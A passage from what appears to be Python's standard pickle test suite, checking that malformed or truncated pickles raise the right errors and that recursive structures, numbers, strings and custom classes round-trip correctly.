self.check_unpickling_error(ValueError, dumped)
@requires_32b
def test_negative_32b_binput(self):
# Issue #12847
dumped = b'\x80\x03X\x01\x00\x00\x00ar\xff\xff\xff\xff.'
self.check_unpickling_error(ValueError, dumped)
def test_badly_escaped_string(self):
self.check_unpickling_error(ValueError, b"S'\\'\n.")
def test_badly_quoted_string(self):
# Issue #17710
badpickles = [b"S'\n.",
b'S"\n.',
b'S\' \n.',
b'S" \n.',
b'S\'"\n.',
b'S"\'\n.',
b"S' ' \n.",
b'S" " \n.',
b"S ''\n.",
b'S ""\n.',
b'S \n.',
b'S\n.',
b'S.']
for p in badpickles:
self.check_unpickling_error(pickle.UnpicklingError, p)
def test_correctly_quoted_string(self):
goodpickles = [(b"S''\n.", ''),
(b'S""\n.', ''),
(b'S"\\n"\n.', '\n'),
(b"S'\\n'\n.", '\n')]
for p, expected in goodpickles:
self.assertEqual(self.loads(p), expected)
def test_frame_readline(self):
pickled = b'\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00I42\n.'
# 0: \x80 PROTO 4
# 2: \x95 FRAME 5
# 11: I INT 42
# 15: . STOP
self.assertEqual(self.loads(pickled), 42)
def test_compat_unpickle(self):
# xrange(1, 7)
pickled = b'\x80\x02c__builtin__\nxrange\nK\x01K\x07K\x01\x87R.'
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), range)
self.assertEqual(unpickled, range(1, 7))
self.assertEqual(list(unpickled), [1, 2, 3, 4, 5, 6])
# reduce
pickled = b'\x80\x02c__builtin__\nreduce\n.'
self.assertIs(self.loads(pickled), functools.reduce)
# whichdb.whichdb
pickled = b'\x80\x02cwhichdb\nwhichdb\n.'
self.assertIs(self.loads(pickled), dbm.whichdb)
# Exception(), StandardError()
for name in (b'Exception', b'StandardError'):
pickled = (b'\x80\x02cexceptions\n' + name + b'\nU\x03ugh\x85R.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), Exception)
self.assertEqual(str(unpickled), 'ugh')
# UserDict.UserDict({1: 2}), UserDict.IterableUserDict({1: 2})
for name in (b'UserDict', b'IterableUserDict'):
pickled = (b'\x80\x02(cUserDict\n' + name +
b'\no}U\x04data}K\x01K\x02ssb.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), collections.UserDict)
self.assertEqual(unpickled, collections.UserDict({1: 2}))
def test_bad_reduce(self):
self.assertEqual(self.loads(b'cbuiltins\nint\n)R.'), 0)
self.check_unpickling_error(TypeError, b'N)R.')
self.check_unpickling_error(TypeError, b'cbuiltins\nint\nNR.')
def test_bad_newobj(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)\x81.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)\x81.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN\x81.')
def test_bad_newobj_ex(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)}\x92.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\n)N\x92.')
def test_bad_stack(self):
badpickles = [
b'.', # STOP
b'0', # POP
b'1', # POP_MARK
b'2', # DUP
b'(2',
b'R', # REDUCE
b')R',
b'a', # APPEND
b'Na',
b'b', # BUILD
b'Nb',
b'd', # DICT
b'e', # APPENDS
b'(e',
b'ibuiltins\nlist\n', # INST
b'l', # LIST
b'o', # OBJ
b'(o',
b'p1\n', # PUT
b'q\x00', # BINPUT
b'r\x00\x00\x00\x00', # LONG_BINPUT
b's', # SETITEM
b'Ns',
b'NNs',
b't', # TUPLE
b'u', # SETITEMS
b'(u',
b'}(Nu',
b'\x81', # NEWOBJ
b')\x81',
b'\x85', # TUPLE1
b'\x86', # TUPLE2
b'N\x86',
b'\x87', # TUPLE3
b'N\x87',
b'NN\x87',
b'\x90', # ADDITEMS
b'(\x90',
b'\x91', # FROZENSET
b'\x92', # NEWOBJ_EX
b')}\x92',
b'\x93', # STACK_GLOBAL
b'Vlist\n\x93',
b'\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_bad_mark(self):
badpickles = [
b'N(.', # STOP
b'N(2', # DUP
b'cbuiltins\nlist\n)(R', # REDUCE
b'cbuiltins\nlist\n()R',
b']N(a', # APPEND
# BUILD
b'cbuiltins\nValueError\n)R}(b',
b'cbuiltins\nValueError\n)R(}b',
b'(Nd', # DICT
b'N(p1\n', # PUT
b'N(q\x00', # BINPUT
b'N(r\x00\x00\x00\x00', # LONG_BINPUT
b'}NN(s', # SETITEM
b'}N(Ns',
b'}(NNs',
b'}((u', # SETITEMS
b'cbuiltins\nlist\n)(\x81', # NEWOBJ
b'cbuiltins\nlist\n()\x81',
b'N(\x85', # TUPLE1
b'NN(\x86', # TUPLE2
b'N(N\x86',
b'NNN(\x87', # TUPLE3
b'NN(N\x87',
b'N(NN\x87',
b']((\x90', # ADDITEMS
# NEWOBJ_EX
b'cbuiltins\nlist\n)}(\x92',
b'cbuiltins\nlist\n)(}\x92',
b'cbuiltins\nlist\n()}\x92',
# STACK_GLOBAL
b'Vbuiltins\n(Vlist\n\x93',
b'Vbuiltins\nVlist\n(\x93',
b'N(\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_truncated_data(self):
self.check_unpickling_error(EOFError, b'')
self.check_unpickling_error(EOFError, b'N')
badpickles = [
b'B', # BINBYTES
b'B\x03\x00\x00',
b'B\x03\x00\x00\x00',
b'B\x03\x00\x00\x00ab',
b'C', # SHORT_BINBYTES
b'C\x03',
b'C\x03ab',
b'F', # FLOAT
b'F0.0',
b'F0.00',
b'G', # BINFLOAT
b'G\x00\x00\x00\x00\x00\x00\x00',
b'I', # INT
b'I0',
b'J', # BININT
b'J\x00\x00\x00',
b'K', # BININT1
b'L', # LONG
b'L0',
b'L10',
b'L0L',
b'L10L',
b'M', # BININT2
b'M\x00',
# b'P', # PERSID
# b'Pabc',
b'S', # STRING
b"S'abc'",
b'T', # BINSTRING
b'T\x03\x00\x00',
b'T\x03\x00\x00\x00',
b'T\x03\x00\x00\x00ab',
b'U', # SHORT_BINSTRING
b'U\x03',
b'U\x03ab',
b'V', # UNICODE
b'Vabc',
b'X', # BINUNICODE
b'X\x03\x00\x00',
b'X\x03\x00\x00\x00',
b'X\x03\x00\x00\x00ab',
b'(c', # GLOBAL
b'(cbuiltins',
b'(cbuiltins\n',
b'(cbuiltins\nlist',
b'Ng', # GET
b'Ng0',
b'(i', # INST
b'(ibuiltins',
b'(ibuiltins\n',
b'(ibuiltins\nlist',
b'Nh', # BINGET
b'Nj', # LONG_BINGET
b'Nj\x00\x00\x00',
b'Np', # PUT
b'Np0',
b'Nq', # BINPUT
b'Nr', # LONG_BINPUT
b'Nr\x00\x00\x00',
b'\x80', # PROTO
b'\x82', # EXT1
b'\x83', # EXT2
b'\x84\x01',
b'\x84', # EXT4
b'\x84\x01\x00\x00',
b'\x8a', # LONG1
b'\x8b', # LONG4
b'\x8b\x00\x00\x00',
b'\x8c', # SHORT_BINUNICODE
b'\x8c\x03',
b'\x8c\x03ab',
b'\x8d', # BINUNICODE8
b'\x8d\x03\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x8e', # BINBYTES8
b'\x8e\x03\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x96', # BYTEARRAY8
b'\x96\x03\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x95', # FRAME
b'\x95\x02\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00N',
]
for p in badpickles:
self.check_unpickling_error(self.truncated_errors, p)
@reap_threads
def test_unpickle_module_race(self):
# https://bugs.python.org/issue34572
locker_module = dedent("""
import threading
barrier = threading.Barrier(2)
""")
locking_import_module = dedent("""
import locker
locker.barrier.wait()
class ToBeUnpickled(object):
pass
""")
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
with open(os.path.join(TESTFN, "locker.py"), "wb") as f:
f.write(locker_module.encode('utf-8'))
with open(os.path.join(TESTFN, "locking_import.py"), "wb") as f:
f.write(locking_import_module.encode('utf-8'))
self.addCleanup(forget, "locker")
self.addCleanup(forget, "locking_import")
import locker
pickle_bytes = (
b'\x80\x03clocking_import\nToBeUnpickled\nq\x00)\x81q\x01.')
# Then try to unpickle two of these simultaneously
# One of them will cause the module import, and we want it to block
# until the other one either:
# - fails (before the patch for this issue)
# - blocks on the import lock for the module, as it should
results = []
barrier = threading.Barrier(3)
def t():
# This ensures the threads have all started
# presumably barrier release is faster than thread startup
barrier.wait()
results.append(pickle.loads(pickle_bytes))
t1 = threading.Thread(target=t)
t2 = threading.Thread(target=t)
t1.start()
t2.start()
barrier.wait()
# could have delay here
locker.barrier.wait()
t1.join()
t2.join()
from locking_import import ToBeUnpickled
self.assertEqual(
[type(x) for x in results],
[ToBeUnpickled] * 2)
class AbstractPickleTests(unittest.TestCase):
# Subclass must define self.dumps, self.loads.
optimized = False
_testdata = AbstractUnpickleTests._testdata
def setUp(self):
pass
assert_is_copy = AbstractUnpickleTests.assert_is_copy
def test_misc(self):
# test various datatypes not tested by testdata
for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assert_is_copy(expected, got)
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def _test_recursive_list(self, cls, aslist=identity, minprotocol=0):
# List containing itself.
l = cls()
l.append(l)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
def test_recursive_list(self):
self._test_recursive_list(list)
def test_recursive_list_subclass(self):
self._test_recursive_list(MyList, minprotocol=2)
def test_recursive_list_like(self):
self._test_recursive_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_tuple_and_list(self, cls, aslist=identity, minprotocol=0):
# Tuple containing a list containing the original tuple.
t = (cls(),)
t[0].append(t)
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = aslist(x[0])
self.assertEqual(len(y), 1)
self.assertIs(y[0], x)
# List containing a tuple containing the original list.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = aslist(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(y[0], tuple)
self.assertEqual(len(y[0]), 1)
self.assertIs(y[0][0], x)
def test_recursive_tuple_and_list(self):
self._test_recursive_tuple_and_list(list)
def test_recursive_tuple_and_list_subclass(self):
self._test_recursive_tuple_and_list(MyList, minprotocol=2)
def test_recursive_tuple_and_list_like(self):
self._test_recursive_tuple_and_list(REX_six, aslist=lambda x: x.items)
def _test_recursive_dict(self, cls, asdict=identity, minprotocol=0):
# Dict containing itself.
d = cls()
d[1] = d
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y.keys()), [1])
self.assertIs(y[1], x)
def test_recursive_dict(self):
self._test_recursive_dict(dict)
def test_recursive_dict_subclass(self):
self._test_recursive_dict(MyDict, minprotocol=2)
def test_recursive_dict_like(self):
self._test_recursive_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing the original tuple.
t = (cls(),)
t[0][1] = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(list(y), [1])
self.assertIs(y[1], x)
# Dict containing a tuple containing the original dict.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y), [1])
self.assertIsInstance(y[1], tuple)
self.assertEqual(len(y[1]), 1)
self.assertIs(y[1][0], x)
def test_recursive_tuple_and_dict(self):
self._test_recursive_tuple_and_dict(dict)
def test_recursive_tuple_and_dict_subclass(self):
self._test_recursive_tuple_and_dict(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like(self):
self._test_recursive_tuple_and_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_dict_key(self, cls, asdict=identity, minprotocol=0):
# Dict containing an immutable object (as key) containing the original
# dict.
d = cls()
d[K(d)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y.keys()), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
def test_recursive_dict_key(self):
self._test_recursive_dict_key(dict)
def test_recursive_dict_subclass_key(self):
self._test_recursive_dict_key(MyDict, minprotocol=2)
def test_recursive_dict_like_key(self):
self._test_recursive_dict_key(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict_key(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing an immutable object (as key)
# containing the original tuple.
t = (cls(),)
t[0][K(t)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
# Dict containing an immutable object (as key) containing a tuple
# containing the original dict.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value[0], x)
def test_recursive_tuple_and_dict_key(self):
self._test_recursive_tuple_and_dict_key(dict)
def test_recursive_tuple_and_dict_subclass_key(self):
self._test_recursive_tuple_and_dict_key(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like_key(self):
self._test_recursive_tuple_and_dict_key(REX_seven, asdict=lambda x: x.table)
def test_recursive_set(self):
# Set containing an immutable object containing the original set.
y = set()
y.add(K(y))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
# Immutable object containing a set containing the original object.
y, = y
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, K)
self.assertIsInstance(x.value, set)
self.assertEqual(len(x.value), 1)
self.assertIs(list(x.value)[0], x)
def test_recursive_inst(self):
# Mutable object containing itself.
i = Object()
i.attr = i
for proto in protocols:
s = self.dumps(i, proto)
x = self.loads(s)
self.assertIsInstance(x, Object)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = Object()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertIs(x[0].attr[1], x)
def _test_recursive_collection_and_inst(self, factory):
# Mutable object containing a collection containing the original
# object.
o = Object()
o.attr = factory([o])
t = type(o.attr)
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x.attr, t)
self.assertEqual(len(x.attr), 1)
self.assertIsInstance(list(x.attr)[0], Object)
self.assertIs(list(x.attr)[0], x)
# Collection containing a mutable object containing the original
# collection.
o = o.attr
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x, t)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], Object)
self.assertIs(list(x)[0].attr, x)
def test_recursive_list_and_inst(self):
self._test_recursive_collection_and_inst(list)
def test_recursive_tuple_and_inst(self):
self._test_recursive_collection_and_inst(tuple)
def test_recursive_dict_and_inst(self):
self._test_recursive_collection_and_inst(dict.fromkeys)
def test_recursive_set_and_inst(self):
self._test_recursive_collection_and_inst(set)
def test_recursive_frozenset_and_inst(self):
self._test_recursive_collection_and_inst(frozenset)
def test_recursive_list_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyList)
def test_recursive_tuple_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyTuple)
def test_recursive_dict_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyDict.fromkeys)
def test_recursive_set_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MySet)
def test_recursive_frozenset_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyFrozenSet)
def test_recursive_inst_state(self):
# Mutable object containing itself.
y = REX_state()
y.state = y
for proto in protocols:
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIs(x.state, x)
def test_recursive_tuple_and_inst_state(self):
# Tuple containing a mutable object containing the original tuple.
t = (REX_state(),)
t[0].state = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], REX_state)
self.assertIs(x[0].state, x)
# Mutable object containing a tuple containing the object.
t, = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIsInstance(x.state, tuple)
self.assertEqual(len(x.state), 1)
self.assertIs(x.state[0], x)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>',
# surrogates
'<\udc80>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assert_is_copy(u, u2)
def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assert_is_copy(t, t2)
def test_bytes(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i, i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
def test_bytearray(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps(b, proto)
bb = self.loads(p)
self.assertIsNot(bb, b)
self.assert_is_copy(b, bb)
if proto <= 3:
# bytearray is serialized using a global reference
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.GLOBAL, p))
elif proto == 4:
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.STACK_GLOBAL, p))
elif proto == 5:
self.assertNotIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.BYTEARRAY8, p))
def test_ints(self):
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assert_is_copy(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
# assert_is_copy is very expensive here as it precomputes
# a failure message by computing the repr() of n and got,
# we just do the check ourselves.
self.assertIs(type(got), int)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assert_is_copy(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
# make sure that floats are formatted locale independent with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
for proto in protocols:
inst = AAA()
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, REDUCE_A)
def test_getinitargs(self):
for proto in protocols:
inst = initarg(1, 2)
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assert_is_copy(inst, loaded)
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_dynamic_class(self):
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
def test_ellipsis(self):
for proto in protocols:
s = self.dumps(..., proto)
u = self.loads(s)
self.assertIs(..., u)
def test_notimplemented(self):
for proto in protocols:
s = self.dumps(NotImplemented, proto)
u = self.loads(s)
self.assertIs(NotImplemented, u)
def test_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
for proto in protocols:
s = self.dumps(type(singleton), proto)
u = self.loads(s)
self.assertIs(type(singleton), u)
# Tests for protocol 2
def test_proto(self):
for proto in protocols:
pickled = self.dumps(None, proto)
if proto >= 2:
proto_header = pickle.PROTO + bytes([proto])
self.assertTrue(pickled.startswith(proto_header))
else:
self.assertEqual(count_opcode(pickle.PROTO, pickled), 0)
oob = protocols[-1] + 1 # a future protocol
build_none = pickle.NONE + pickle.STOP
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as err:
self.assertIn("unsupported pickle protocol", str(err))
else:
self.fail("expected bad protocol number to raise ValueError")
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
expected = expected_opcode[min(proto, 3), len(x)]
self.assertTrue(opcode_in_pickle(expected, s))
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[min(proto, 3), x]
self.assertTrue(opcode_in_pickle(expected, s))
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assert_is_copy(x, y) # XXX revisit
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_proxies(self):
# NEWOBJ should use the __class__ rather than the raw type
classes = myclasses[:]
# Cannot create weakproxies to these classes
for c in (MyInt, MyTuple):
classes.remove(c)
for proto in protocols:
for C in classes:
B = C.__base__
x = C(C.sample)
x.foo = 42
p = weakref.proxy(x)
s = self.dumps(p, proto)
y = self.loads(s)
self.assertEqual(type(y), type(x)) # rather than type(p)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_overridden_new(self):
# Test that Python class with C implemented __new__ is pickleable
for proto in protocols:
x = MyIntWithNew2(1)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
self.assertIs(type(y), MyIntWithNew2)
self.assertEqual(int(y), 1)
self.assertEqual(y.foo, 42)
def test_newobj_not_class(self):
# Issue 24552
global SimpleNewObj
save = SimpleNewObj
o = SimpleNewObj.__new__(SimpleNewObj)
b = self.dumps(o, 4)
try:
SimpleNewObj = 42
self.assertRaises((TypeError, pickle.UnpicklingError), self.loads, b)
finally:
SimpleNewObj = save
# Register a type with copyreg, with extension code extcode. Pickle
# an object of that type. Check that the resulting pickle uses opcode
# (EXT[124]) under proto 2, and not in proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertIn(__name__.encode("utf-8"), s1)
self.assertIn(b"MyList", s1)
self.assertFalse(opcode_in_pickle(opcode, s1))
y = self.loads(s1)
self.assert_is_copy(x, y)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertNotIn(__name__.encode("utf-8"), s2)
self.assertNotIn(b"MyList", s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assert_is_copy(x, y)
finally:
e.restore()
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
